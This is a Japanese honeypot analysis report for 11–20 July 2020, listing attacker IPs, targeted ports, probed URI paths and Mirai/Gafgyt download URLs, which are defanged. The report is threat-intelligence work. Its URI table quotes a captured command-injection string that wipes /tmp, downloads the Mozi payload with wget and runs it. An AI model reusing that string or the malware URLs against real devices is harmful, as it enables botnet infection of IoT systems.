2020/7/11-7/20 のハニーポットの簡易分析となります。
Honeytrap(Total)
Number of detections
| Date | Detections |
|---|---|
| 20200711 | 10199 |
| 20200712 | 10806 |
| 20200713 | 142645 |
| 20200714 | 20625 |
| 20200715 | 17479 |
| 20200716 | 17890 |
| 20200717 | 30806 |
| 20200718 | 10413 |
| 20200719 | 35053 |
| 20200720 | 17726 |
RemoteIP(TOP20)
| IP | Country | Count | AbuseIPDB |
|---|---|---|---|
| 193[.]106[.]31[.]106 | Ukraine | 131712 件 | Link |
| 45[.]141[.]87[.]2 | Russia | 30745 件 | Link |
| 185[.]202[.]1[.]188 | France | 16894 件 | Link |
| 45[.]141[.]86[.]142 | Russia | 13119 件 | Link |
| 192[.]35[.]169[.]48 | United States | 7836 件 | Link |
| 194[.]61[.]54[.]237 | Russia | 6568 件 | Link |
| 218[.]92[.]0[.]208 | China | 6365 件 | Link |
| 91[.]241[.]19[.]174 | Russia | 6341 件 | Link |
| 213[.]108[.]134[.]156 | Russia | 5215 件 | Link |
| 185[.]202[.]2[.]32 | France | 2719 件 | Link |
| 185[.]202[.]1[.]82 | France | 2506 件 | Link |
| 185[.]202[.]2[.]21 | France | 2458 件 | Link |
| 91[.]241[.]19[.]173 | Russia | 1999 件 | Link |
| 79[.]124[.]8[.]77 | United Kingdom | 1888 件 | Link |
| 209[.]97[.]171[.]184 | Singapore | 1673 件 | Link |
| 5[.]188[.]206[.]50 | United States | 1454 件 | Link |
| 49[.]88[.]112[.]70 | China | 1023 件 | Link |
| 193[.]142[.]146[.]19 | Netherlands | 1009 件 | Link |
| 167[.]99[.]164[.]22 | United States | 938 件 | Link |
| 218[.]92[.]0[.]211 | China | 852 件 | Link |
Port(TOP20)
| Port | Service | Count |
|---|---|---|
| 22 | The Secure Shell (SSH) Protocol | 17335 件 |
| 445 | Microsoft-DS | 16998 件 |
| 1433 | Microsoft-SQL-Server | 12738 件 |
| 3389 | MS WBT Server | 4343 件 |
| 8088 | Radan HTTP | 1362 件 |
| 81 | Unknown | 1032 件 |
| 502 | Modbus Application Protocol | 790 件 |
| 8080 | HTTP Alternate (see port 80) | 376 件 |
| 5432 | PostgreSQL Database | 376 件 |
| 88 | Kerberos | 261 件 |
| 5555 | Android Debug Bridge | 239 件 |
| 8081 | Sun Proxy Admin Service | 212 件 |
| 139 | NETBIOS Session Service | 181 件 |
| 8443 | PCsync HTTPS | 180 件 |
| 21 | File Transfer Protocol [Control] | 167 件 |
| 85 | MIT ML Device | 162 件 |
| 37215 | Unknown | 158 件 |
| 6379 | An advanced key-value cache and store | 155 件 |
| 8089 | Unknown | 144 件 |
| 9200 | WAP connectionless session service | 139 件 |
URI PATH
/streaming/clients_live[.]php
脆弱性の種類は特定できていませんが、/streaming/clients_live[.]php 宛への通信は複数ポートで確認できました。
| URI Path | Target | CVE | Count |
|---|---|---|---|
| No uri path | - | - | 302276 件 |
| / | - | - | 7255 件 |
| /ws/v1/cluster/apps/new-application | Apache Hadoop | - | 1263 件 |
| login[.]cgi | D-Link Router | - | 248 件 |
| /streaming/clients_live[.]php | - | - | 170 件 |
| /ftptest[.]cgi | Web Camera | - | 162 件 |
| /set_ftp[.]cgi | - | - | 159 件 |
| hxxp://163[.]172[.]88[.]110:41298/pass | Unauthorized relay | - | 144 件 |
| /ctrlt/DeviceUpgrade_1 | Huawei Home Device | - | 141 件 |
| sip:nm | Session Initiation Protocol | - | 103 件 |
| /nice | - | - | 99 件 |
| /stalker_portal/c/ | - | - | 86 件 |
| /stalker_portal/c/version[.]js | - | - | 85 件 |
| /client_area/ | Unknown | Unknown | 85 件 |
| /system_api[.]php | - | - | 85 件 |
| /api[.]php | api | - | 85 件 |
| /login[.]php | Login Page | - | 85 件 |
| /streaming | - | - | 85 件 |
| /streaming/er678pkf[.]php | - | - | 85 件 |
| /picsdesc[.]xml | Realtek SDK | CVE-2014-8361 | 61 件 |
| hxxp://clientapi[.]ipip[.]net/echo[.]php | Unauthorized relay | - | 57 件 |
| /admin/assets/js/views/login[.]js | FreePBX | - | 56 件 |
| /manager/html | Apache Tomcat Manager | - | 45 件 |
| /version | - | - | 44 件 |
| /shell | - | - | 42 件 |
| hxxp://example[.]com/ | Unauthorized relay | - | 36 件 |
| /service/extdirect | - | - | 32 件 |
| hxxp://112[.]35[.]66[.]7:8088/index[.]ph p |
- | - | 32 件 |
| /jars | Unknown | - | 31 件 |
| /jmx | JMX | - | 29 件 |
| /ipp | CUPS | CVE-2015-1158 | 26 件 |
| /_ping | Unknown | - | 24 件 |
| hxxp://112[.]35[.]63[.]31:8088/index[.]p hp |
- | - | 22 件 |
| /v1[.]16/version | - | - | 21 件 |
| hxxp://112[.]124[.]42[.]80:63435/ | Unauthorized relay | - | 20 件 |
| /setup/index[.]jsp | - | - | 17 件 |
| /solr/admin/info/system | - | - | 14 件 |
| hxxp://112[.]35[.]88[.]28:8088/index[.]p hp |
- | - | 14 件 |
| /api/v1/targets | api | - | 12 件 |
| /api/v1/label/version/values | api | - | 12 件 |
| hxxp://pv[.]sohu[.]com/cityjson | Unauthorized relay | - | 12 件 |
| hxxp://112[.]35[.]53[.]83:8088/index[.]p hp |
- | - | 12 件 |
| /_search | Elasticsearch | - | 11 件 |
| /\cgi-bin/get_status[.]cgi | Apexis IP CAM | - | 11 件 |
| /config/getuser | - | - | 10 件 |
| /\cgi-bin/login[.]cgi | Crestron AirMedia AM-100 | CVE-2016-5639 | 10 件 |
| hxxp://123[.]125[.]114[.]144/ | Unauthorized relay | - | 10 件 |
| /containers/json | Docker | - | 10 件 |
| /hudson | Unknown | - | 9 件 |
| /tmUnblock[.]cgi | - | - | 9 件 |
| /info | - | - | 9 件 |
| /stats | - | - | 9 件 |
| /db/manage/ | Database | - | 9 件 |
| /api/v1/label/goversion/values | api | - | 8 件 |
| /api/v1/query | api | - | 8 件 |
| /wls-wsat/CoordinatorPortType11 | Weblogic | CVE-2017-10271 | 7 件 |
| /v1[.]40/containers/json | Docker | - | 7 件 |
| /lib/flagrate/flagrate[.]min[.]css | Flagrate | - | 6 件 |
| /images/json | Docker | - | 6 件 |
| /setup/eureka_info | - | - | 6 件 |
| rtsp://160[.]16[.]145[.]183:554/12 | RTSP | - | 5 件 |
| /admin-scripts[.]asp | Administrator | - | 5 件 |
| /phpMyAdmin-3[.]0[.]0[.]0-all-languages/ scripts/setup[.]php |
phpMyAdmin | - | 5 件 |
| /tmpfs/auto[.]jpg | - | - | 4 件 |
| /UD/ | Eir D1000 Wireless Router | - | 4 件 |
| /manager/text/list | Apache Tomcat Manager | - | 4 件 |
| /wsman | WinRM | - | 4 件 |
| /status | - | - | 3 件 |
| /cgi-bin/supervisor/CloudSetup[.]cgi | CGI | - | 3 件 |
| /Telerik[.]Web[.]UI[.]WebResource[.]axd | - | - | 3 件 |
| /_config | Unknown | Unknown | 3 件 |
| hxxps://hxxpbin[.]org/ip | Unauthorized Relay | - | 3 件 |
| RTSP://160[.]16[.]145[.]183:554/ | RTSP | - | 2 件 |
| RTSP://160[.]16[.]145[.]183:8554/ | RTSP | - | 2 件 |
| /json_rpc | JSON-RPC | - | 2 件 |
| /admin/login[.]asp | Administrator | - | 2 件 |
| rtsp:// | RTSP | - | 2 件 |
| /upnpdev[.]xml | Huawei Home Gateway(HG655m) | - | 2 件 |
| /tr064dev[.]xml | - | - | 2 件 |
| /solr/ | - | - | 2 件 |
| /TP/public/index[.]php | - | - | 2 件 |
| /UD/act | Eir D1000 Wireless Router | - | 2 件 |
| /_cat/indices | Elasticsearch | - | 2 件 |
| /cgi-bin/bfenterprise/clientregister[.]e xe |
CGI | - | 2 件 |
| /ws/v1/cluster | Apache Hadoop | - | 2 件 |
| /cgi-bin/nobody/Search[.]cgi | CGI | - | 2 件 |
| /master-status | Unknown | - | 2 件 |
| /boaform/admin/formLogin | Administrator | - | 2 件 |
| /install[.]php | php | - | 2 件 |
| /upnp/control/WANIPConn1 | UPnP | - | 2 件 |
| /0bef | Unknown | - | 1 件 |
| hxxp://160[.]16[.]145[.]183:49152/upnp/c ontrol/basicevent1 |
Unauthorized relay | - | 1 件 |
| /admin/connection/ | Administrator | - | 1 件 |
| /server-info | - | - | 1 件 |
| /HNAP1/ | D-Link Router | CVE-2017-3193 | 1 件 |
| /wls-wsat/CoordinatorPortType | Weblogic | CVE-2017-10271 | 1 件 |
| /cgi | CGI | - | 1 件 |
| /fikker/webcache[.]fik | Fikker | - | 1 件 |
| /_nodes | Unknown | Unknown | 1 件 |
| rtsp://160[.]16[.]145[.]183:21553/12 | RTSP | - | 1 件 |
| rtsp://160[.]16[.]145[.]183:44554/12 | RTSP | - | 1 件 |
| /check | Unknown | Unknown | 1 件 |
| hxxp://www[.]overflow[.]biz/ip_json[.]ph p |
Unauthorized relay | - | 1 件 |
| /wp-login[.]php | WordPress | - | 1 件 |
| RTSP://160[.]16[.]145[.]183:10554/ | RTSP | - | 1 件 |
| /nwa | Unknown | Unknown | 1 件 |
| /script | - | - | 1 件 |
| /language/Swedish${IFS}&&cd${IFS}/tmp;rm ${IFS}-rf${IFS}*;wget${IFS}hxxp://192[.] 168[.]1[.]1:8088/Mozi[.]a;sh${IFS}/tmp/M ozi[.]a&>r&&tar${IFS}/string[.]js |
Multiple CCTV-DVR Vendors | - | 1 件 |
| /versions | - | - | 1 件 |
| /favicon[.]ico | favicon | - | 1 件 |
| /cluser | Unknown | Unknown | 1 件 |
| /api/v1 | api | - | 1 件 |
| /setup[.]xml | - | - | 1 件 |
| /v2/stats/self | - | - | 1 件 |
| /A6nw | Unknown | Unknown | 1 件 |
| /live/CPEManager/AXCampaignManager/delet e_cpes_by_ids |
Zyxel CNM SecuManager | - | 1 件 |
| /setup[.]cgi | - | - | 1 件 |
| /jsproxy | MikroTik RouterOS | - | 1 件 |
| hxxps://api[.]ipify[.]org/ | Unauthorized Relay | - | 1 件 |
| /login | Login Page | - | 1 件 |
| /CTCWebService/CTCWebServiceBean | SAP | CVE-2020-6286 CVE-2020-6287 | 1 件 |
| /invoker/EJBInvokerServlet | HP Product | CVE-2013-4810 | 1 件 |
| /api | api | - | 1 件 |
Malware
hxxp://37[.]49[.]230[.]201/ScyllaBinsLMaOGuESsWhatYerNotGettIn3m/Scylla[.]mips
Eir D1000 ルータの脆弱性を狙った攻撃でMiraiをダウンロードを試みている通信でした。
User-Agentが特徴的なので特定のMiraiの種類かもしれません。
<ペイロード>
POST /UD/act?1 HTTP/1.1
User-Agent: Masayki
| First Ditection | MalwareURL | Count | VirusTotal | SHA1 |
|---|---|---|---|---|
| 2020-03-14 | hxxp://d[.]powerofwish[.]com/pm[.]sh | 33 | No Data | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| 2020-07-17 | hxxp://45[.]95[.]168[.]248/1/c[.]sh | 12 | No Data | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| 2020-07-14 | hxxp://ev0lve[.]cf/arm | 7 | Avast:ELF:Svirtu-AA [Trj], Kaspersky:HEUR:Backdoor[.]Linux[.]Mirai[.]b, Tencent:Backdoor[.]Linux[.]Mirai[.]waq, Fortinet:ELF/Mirai[.]A!tr, ZoneAlarm:HEUR:Backdoor[.]Linux[.]Mirai[.]b, Avast-Mobile:ELF:Svirtu-AA [Trj], Ikarus:Trojan[.]Linux[.]Mirai, AVG:ELF:Svirtu-AA [Trj] |
9ca04ed2689561449b7e93cc375ec458a2a7891b |
| 2020-07-14 | hxxp://185[.]172[.]110[.]178/8UsA[.]sh | 5 | No Data | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| 2020-07-14 | hxxp://185[.]172[.]110[.]250/infect | 5 | NG | No Hash |
| 2020-07-08 | hxxp://95[.]213[.]165[.]45/beastmode | 4 | No Data | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| 2020-07-13 | hxxp://94[.]232[.]252[.]38/infect | 4 | NG | No Hash |
| 2020-07-13 | 45[.]95[.]168[.]143/beastmode/b3astmode[.]arm7 | 4 | NG | No Hash |
| 2020-03-15 | hxxp://185[.]62[.]189[.]18/jaws[.]sh | 4 | NG | No Hash |
| 2020-07-14 | hxxp://45[.]95[.]168[.]230/YesK4Pz9CJ7dQ0EUhkwc3tXSWoR5rB/Meth[.]mips | 3 | FireEye:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]8, Symantec:Linux[.]Mirai, ESET-NOD32:a variant of Linux/Mirai[.]L, ClamAV:Unix[.]Dropper[.]Mirai-7135870-0, Kaspersky:HEUR:Backdoor[.]Linux[.]Mirai[.]b, BitDefender:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]8, Rising:Backdoor[.]Mirai/Linux!1[.]BAF6 (CLASSIC), Emsisoft:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]8 (B), DrWeb:Linux[.]Mirai[.]2058, Sophos:Linux/DDoS-DD, Ikarus:Trojan[.]Linux[.]Gafgyt, Arcabit:Trojan[.]Trojan[.]Linux[.]Gafgyt[.]8, ZoneAlarm:HEUR:Backdoor[.]Linux[.]Mirai[.]b, MAX:malware (ai score=89), Tencent:Backdoor[.]Linux[.]Mirai[.]wao, GData:Gen:Variant[.]Trojan[.]Linux[.]Gafgyt[.]8 |
e49bf19e578d5eda1b15079ec9ae44d177692ab4 |
| 2020-07-09 | hxxp://94[.]102[.]54[.]78/bins/mpsl | 2 | NG | No Hash |
| 2020-07-10 | hxxp://165[.]227[.]54[.]195/666[.]sh | 2 | NG | No Hash |
| 2020-07-13 | hxxp://23[.]254[.]217[.]64/ttee[.]sh | 2 | No Data | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| 2020-07-14 | hxxp://45[.]95[.]168[.]190/infect | 2 | No Data | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| 2020-07-15 | hxxp://67[.]205[.]173[.]140/666[.]sh | 2 | No Data | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| 2020-06-26 | hxxp://5[.]206[.]227[.]228/curl | 2 | No Data | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| 2020-07-16 | hxxp://5[.]206[.]227[.]228/jaw | 2 | No Data | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| 2020-07-18 | hxxp://91[.]189[.]187[.]163/s[.]sh | 2 | No Data | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| 2020-07-18 | hxxp://45[.]143[.]223[.]42/GhOul[.]sh | 2 | No Data | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| 2020-07-10 | hxxp://45[.]88[.]3[.]145/bins/mpsl | 1 | DrWeb:Linux[.]Mirai[.]53, ClamAV:Unix[.]Dropper[.]Mirai-7136015-0, FireEye:Trojan[.]Linux[.]Mirai[.]1, McAfee:GenericRXJE-XQ!8EDCFBF9C4EF, BitDefenderTheta:Gen:NN[.]Mirai[.]34132, TrendMicro-HouseCall:Backdoor[.]Linux[.]MIRAI[.]VWIUL, Avast:ELF:Mirai-AAJ [Trj], Kaspersky:HEUR:Backdoor[.]Linux[.]Mirai[.]b, BitDefender:Trojan[.]Linux[.]Mirai[.]1, MicroWorld-eScan:Trojan[.]Linux[.]Mirai[.]1, Rising:Backdoor[.]Mirai!8[.]E05B (TFE:14:axYsWbEAOXT), Ad-Aware:Trojan[.]Linux[.]Mirai[.]1, TrendMicro:Backdoor[.]Linux[.]MIRAI[.]VWIUL, Emsisoft:Trojan[.]Linux[.]Mirai[.]1 (B), Cyren:ELF/Mirai[.]G[.]gen!Camelot, Jiangmin:Backdoor[.]Linux[.]dzex, Fortinet:ELF/Gafgyt[.]KR!tr, Antiy-AVL:Trojan[Backdoor]/Linux[.]Mirai[.]b, Arcabit:Trojan[.]Linux[.]Mirai[.]1, ZoneAlarm:HEUR:Backdoor[.]Linux[.]Mirai[.]b, Avast-Mobile:ELF:Mirai-ANO [Trj], AhnLab-V3:Linux/Mirai[.]Gen13, ALYac:Trojan[.]Linux[.]Mirai[.]1, MAX:malware (ai score=84), ESET-NOD32:a variant of Linux/Mirai[.]L, Tencent:Backdoor[.]Linux[.]Mirai[.]wav, Ikarus:Trojan[.]Linux[.]Mirai, GData:Linux[.]Trojan[.]Mirai[.]G, AVG:ELF:Mirai-AAJ [Trj] |
ecf91aa86bafb3f64d97c6f696637e80f436f1e3 |
| 2020-07-10 | hxxp://95[.]213[.]165[.]45/beastmode/b3astmode[.]mips | 1 | NG | No Hash |
| 2020-04-10 | hxxp://176[.]123[.]3[.]96/arm7 | 1 | NG | No Hash |
| 2020-07-11 | hxxp://199[.]195[.]249[.]22/Jaws[.]sh | 1 | No Data | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| 2020-07-11 | hxxp://37[.]49[.]230[.]201/ScyllaBinsLMaOGuESsWhatYerNotGettIn3m/Scylla[.]mips | 1 | ClamAV:Unix[.]Trojan[.]Gafgyt-6748839-0, FireEye:Trojan[.]Linux[.]Mirai[.]1, McAfee:Linux/Mirai-FDXO!3D7446FAA94C, Sangfor:Malware, BitDefenderTheta:Gen:NN[.]Mirai[.]34132, ESET-NOD32:a variant of Linux/Mirai[.]BC, TrendMicro-HouseCall:Trojan[.]Linux[.]MIRAI[.]SMMR1, Avast:ELF:Hajime-R [Trj], Kaspersky:HEUR:Backdoor[.]Linux[.]Mirai[.]ad, BitDefender:Trojan[.]Linux[.]Mirai[.]1, MicroWorld-eScan:Trojan[.]Linux[.]Mirai[.]1, Tencent:Backdoor[.]Linux[.]Mirai[.]wao, Ad-Aware:Trojan[.]Linux[.]Mirai[.]1, TrendMicro:Trojan[.]Linux[.]MIRAI[.]SMMR1, Emsisoft:Trojan[.]Linux[.]Mirai[.]1 (B), Cyren:ELF/Mirai[.]D[.]gen!Camelot, Fortinet:ELF/Mirai[.]AE!tr, Arcabit:Trojan[.]Linux[.]Mirai[.]1, ZoneAlarm:HEUR:Backdoor[.]Linux[.]Mirai[.]ad, Avast-Mobile:ELF:Mirai-UF [Trj], Microsoft:DDoS:Linux/Gafgyt[.]YA!MTB, AhnLab-V3:Linux/Mirai[.]Gen3, ALYac:Trojan[.]Linux[.]Mirai[.]1, MAX:malware (ai score=82), Rising:Backdoor[.]Mirai/Linux!1[.]BAF6 (CLASSIC), Ikarus:Trojan[.]Linux[.]Mirai, GData:Linux[.]Trojan[.]Mirai[.]J, AVG:ELF:Hajime-R [Trj] |
b70222bb25d4b2cd797786c2a6fdeba29be0d9b1 |
| 2020-07-11 | hxxp://37[.]49[.]230[.]201/ScyllaBinsLMaOGuESsWhatYerNotGettIn3m/Scylla[.]x86 | 1 | MicroWorld-eScan:Trojan[.]Linux[.]Mirai[.]1, ClamAV:Unix[.]Trojan[.]Gafgyt-6748839-0, FireEye:Trojan[.]Linux[.]Mirai[.]1, ALYac:Trojan[.]Linux[.]Mirai[.]1, Sangfor:Malware, Symantec:Trojan[.]Gen[.]NPE, TrendMicro-HouseCall:Trojan[.]Linux[.]MIRAI[.]SMMR1, Avast:ELF:Hajime-R [Trj], Cynet:Malicious (score: 85), Kaspersky:HEUR:Backdoor[.]Linux[.]Mirai[.]ad, BitDefender:Trojan[.]Linux[.]Mirai[.]1, Rising:Backdoor[.]Mirai/Linux!1[.]BAF6 (CLASSIC), Ad-Aware:Trojan[.]Linux[.]Mirai[.]1, Emsisoft:Trojan[.]Linux[.]Mirai[.]1 (B), F-Secure:Malware[.]LINUX/Mirai[.]jwskl, TrendMicro:Trojan[.]Linux[.]MIRAI[.]SMMR1, Sophos:Mal/Generic-S, SentinelOne:DFI - Malicious ELF, Cyren:ELF/Mirai[.]D[.]gen!Camelot, Avira:LINUX/Mirai[.]jwskl, Fortinet:ELF/Mirai[.]AT!tr, Arcabit:Trojan[.]Linux[.]Mirai[.]1, ZoneAlarm:HEUR:Backdoor[.]Linux[.]Mirai[.]ad, Avast-Mobile:ELF:Mirai-UF [Trj], Microsoft:DDoS:Linux/Gafgyt[.]YA!MTB, AhnLab-V3:Linux/Mirai[.]Gen3, McAfee:Linux/Mirai-FDXO!9590D1AD3D40, MAX:malware (ai score=87), ESET-NOD32:a variant of Linux/Mirai[.]AX, Tencent:Backdoor[.]Linux[.]Mirai[.]wan, Ikarus:Trojan[.]Linux[.]Mirai, GData:Linux[.]Trojan[.]Mirai[.]J, BitDefenderTheta:Gen:NN[.]Mirai[.]34132, AVG:ELF:Hajime-R [Trj] |
933d27a06a8b97aebec3fce02e764700de13a488 |
| 2020-05-18 | hxxp://YOURIPHERE/bins/mpsl | 1 | NG | No Hash |
| 2020-07-14 | hxxp://45[.]95[.]168[.]230/sn0rt[.]sh | 1 | No Data | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| 2020-04-17 | hxxp://205[.]185[.]115[.]72/b | 1 | NG | No Hash |
| 2020-07-15 | hxxp://164[.]90[.]154[.]158/reaper/reap[.]mpsl | 1 | NG | No Hash |
| 2020-04-17 | hxxp://192[.]168[.]1[.]1:8088/Mozi[.]a | 1 | NG | No Hash |
| 2020-07-17 | 95[.]213[.]165[.]43/bins/UnHAnaAW[.]arm7 | 1 | NG | No Hash |
| 2020-04-20 | hxxp://178[.]33[.]64[.]107/arm7 | 1 | NG | No Hash |
| 2020-07-18 | hxxp://185[.]172[.]111[.]182/8UsA[.]sh | 1 | No Data | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
WOWHoneypot(Total)
Number of detections
| Date | Detections |
|---|---|
| 20200711 | 55 |
| 20200712 | 251 |
| 20200713 | 411 |
| 20200714 | 741 |
| 20200715 | 135 |
| 20200716 | 86 |
| 20200717 | 365 |
| 20200718 | 2062 |
| 20200719 | 70 |
| 20200720 | 106 |
RemoteIP(TOP20)
| IP | Country | Count | AbuseIPDB |
|---|---|---|---|
| 31[.]193[.]21[.]39 | Italy | 2001 件 | Link |
| 185[.]128[.]41[.]50 | Switzerland | 514 件 | Link |
| 185[.]216[.]140[.]239 | Netherlands | 172 件 | Link |
| 195[.]54[.]160[.]21 | Russia | 44 件 | Link |
| 107[.]167[.]7[.]226 | United States | 42 件 | Link |
| 103[.]75[.]189[.]81 | Malaysia | 20 件 | Link |
| 195[.]54[.]160[.]135 | Russia | 19 件 | Link |
| 143[.]92[.]32[.]86 | Cambodia | 16 件 | Link |
| 80[.]82[.]70[.]140 | Seychelles | 12 件 | Link |
| 143[.]92[.]32[.]106 | Cambodia | 12 件 | Link |
| 35[.]200[.]47[.]165 | Unknown | 12 件 | Link |
| 93[.]174[.]93[.]139 | Netherlands | 11 件 | Link |
| 167[.]99[.]164[.]22 | United States | 11 件 | Link |
| 45[.]199[.]113[.]16 | United States | 10 件 | Link |
| 185[.]100[.]87[.]248 | Romania | 10 件 | Link |
| 65[.]74[.]177[.]84 | United States | 9 件 | Link |
| 93[.]113[.]111[.]100 | United Kingdom | 9 件 | Link |
| 62[.]210[.]185[.]4 | France | 9 件 | Link |
| 46[.]101[.]31[.]59 | United Kingdom | 9 件 | Link |
| 104[.]199[.]101[.]230 | United States | 9 件 | Link |
URI PATH
| URI Path | Target | CVE | Count |
|---|---|---|---|
| /manager/html | Apache Tomcat Manager | - | 2516 件 |
| /wp-login[.]php | WordPress | - | 588 件 |
| / | - | - | 420 件 |
| /xmlrpc[.]php | Wordpress | - | 294 件 |
| github[.]com:443 | Unauthorized Relay | - | 30 件 |
| /phpMyAdmin/scripts/setup[.]php | phpMyAdmin | - | 24 件 |
| hxxpbin[.]org:443 | Unauthorized Relay | - | 14 件 |
| /solr/admin/info/system | - | - | 11 件 |
| /index[.]php | - | - | 11 件 |
| /vendor/phpunit/phpunit/src/Util/PHP/eva l-stdin[.]php |
PHPUnit | CVE-2017-9841 | 10 件 |
| /hudson | Unknown | - | 9 件 |
| /api/jsonws/invoke | api | - | 9 件 |
| /cgi-bin/mainfunction[.]cgi | CGI | - | 8 件 |
| /[.]env | Hidden files | - | 8 件 |
| /portal/redlion | Unknown | Unknown | 8 件 |
| /config/getuser | - | - | 8 件 |
| sm[.]bdimg[.]com:443 | Unauthorized Relay | - | 7 件 |
| /boaform/admin/formLogin | Administrator | - | 6 件 |
| g[.]alicdn[.]com:443 | Unauthorized Relay | - | 6 件 |
| /favicon[.]ico | favicon | - | 5 件 |
| /admin/login[.]asp | Administrator | - | 3 件 |
| /webfig/ | MikroTik RouterOS | - | 3 件 |
| /phpmyadmin/ | phpMyAdmin | - | 3 件 |
| /myadmin/scripts/setup[.]php | Administrator | - | 3 件 |
| /phpmy/scripts/setup[.]php | phpMyAdmin | - | 3 件 |
| /pma/scripts/setup[.]php | phpMyAdmin | - | 3 件 |
| /shell | - | - | 3 件 |
| /robots[.]txt | robots.txt | - | 3 件 |
| /cgi-bin/kerbynet | CGI | - | 3 件 |
| /ipc$ | shared folder | - | 2 件 |
| /database/scripts/setup[.]php | Database | - | 2 件 |
| /db/scripts/setup[.]php | Database | - | 2 件 |
| /dbadmin/scripts/setup[.]php | Administrator | - | 2 件 |
| /my/scripts/setup[.]php | PHPMyAdmin | - | 2 件 |
| /mysql/scripts/setup[.]php | MySQL | - | 2 件 |
| /mysqladmin/scripts/setup[.]php | MySQL | - | 2 件 |
| /phpMyAdmin-2/scripts/setup[.]php | phpMyAdmin | - | 2 件 |
| /phpadmin/scripts/setup[.]php | Administrator | - | 2 件 |
| /phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 2 件 |
| /phpmyadmin1/scripts/setup[.]php | phpMyAdmin | - | 2 件 |
| /phpmyadmin2/scripts/setup[.]php | phpMyAdmin | - | 2 件 |
| /scripts/setup[.]php | - | - | 2 件 |
| /sqladm/scripts/setup[.]php | - | - | 2 件 |
| /sqladmin/scripts/setup[.]php | - | - | 2 件 |
| /MyAdmin/scripts/setup[.]php | Administrator | - | 2 件 |
| hxxp://example[.]com/ | Unauthorized relay | - | 2 件 |
| /streaming/clients_live[.]php | - | - | 2 件 |
| /sdk | - | - | 2 件 |
| /[.]remote | Hidden files | - | 2 件 |
| /[.]local | Hidden files | - | 2 件 |
| /[.]production | Hidden files | - | 2 件 |
| //vendor/[.]env | - | - | 2 件 |
| //lib/[.]env | - | - | 2 件 |
| //lab/[.]env | - | - | 2 件 |
| //cronlab/[.]env | - | - | 2 件 |
| //cron/[.]env | - | - | 2 件 |
| //core/[.]env | - | - | 2 件 |
| //core/app/[.]env | - | - | 2 件 |
| //core/Datavase/[.]env | - | - | 2 件 |
| //database/[.]env | - | - | 2 件 |
| //config/[.]env | - | - | 2 件 |
| //assets/[.]env | - | - | 2 件 |
| //app/[.]env | - | - | 2 件 |
| //apps/[.]env | - | - | 2 件 |
| //uploads/[.]env | - | - | 2 件 |
| //sitemaps/[.]env | - | - | 2 件 |
| //saas/[.]env | - | - | 2 件 |
| /wp-content/plugins/t_file_wp/t_file_wp[ .]php |
WordPress | - | 2 件 |
| /wordpress/wp-login[.]php | WordPress | - | 2 件 |
| 5[.]132[.]162[.]27:443 | Unauthorized Relay | - | 2 件 |
| hxxp://163[.]172[.]88[.]110:41298/pass | Unauthorized relay | - | 2 件 |
| /sitemap[.]xml | - | - | 2 件 |
| /[.]well-known/security[.]txt | Hidden files | - | 2 件 |
| /boaform/admin/formPing | Administrator | - | 1 件 |
| ext[.]baidu[.]com:443 | Unauthorized Relay | - | 1 件 |
| hxxp://112[.]124[.]42[.]80:63435/ | Unauthorized relay | - | 1 件 |
| /w00tw00t[.]at[.]blackhats[.]romanian[.] anti-sec:) |
ZmEu | - | 1 件 |
| /2phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /PMA/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /PMA2011/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /PMA2012/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /PMA2013/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /PMA2015/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /PMA2016/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /PMA2018/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /SQL/scripts/setup[.]php | - | - | 1 件 |
| /_PHPMYADMIN/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /admin/db/scripts/setup[.]php | Administrator | - | 1 件 |
| /admin/mysql/scripts/setup[.]php | MySQL | - | 1 件 |
| /admin/pMA/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /admin/phpMyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /admin/scripts/setup[.]php | Administrator | - | 1 件 |
| /admin/setup[.]php | Administrator | - | 1 件 |
| /admin/sql/scripts/setup[.]php | SQL | - | 1 件 |
| /admin/sqladmin/scripts/setup[.]php | SQLAdmin | - | 1 件 |
| /admin/sysadmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /admin/web/scripts/setup[.]php | Administrator | - | 1 件 |
| /administrator1/admin/scripts/setup[.]ph p |
Administrator | - | 1 件 |
| /administrator1/db/scripts/setup[.]php | Administrator | - | 1 件 |
| /administrator1/pma/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /administrator1/web/scripts/setup[.]php | Administrator | - | 1 件 |
| /administrator/admin/scripts/setup[.]php | Administrator | - | 1 件 |
| /administrator/db/scripts/setup[.]php | Administrator | - | 1 件 |
| /administrator/pma/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /administrator/web/scripts/setup[.]php | Administrator | - | 1 件 |
| /blog/phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /cpadmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /cpadmindb/scripts/setup[.]php | Administrator | - | 1 件 |
| /cpanelmysql/scripts/setup[.]php | MySQL | - | 1 件 |
| /cpanelphpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /db/db-admin/scripts/setup[.]php | Administrator | - | 1 件 |
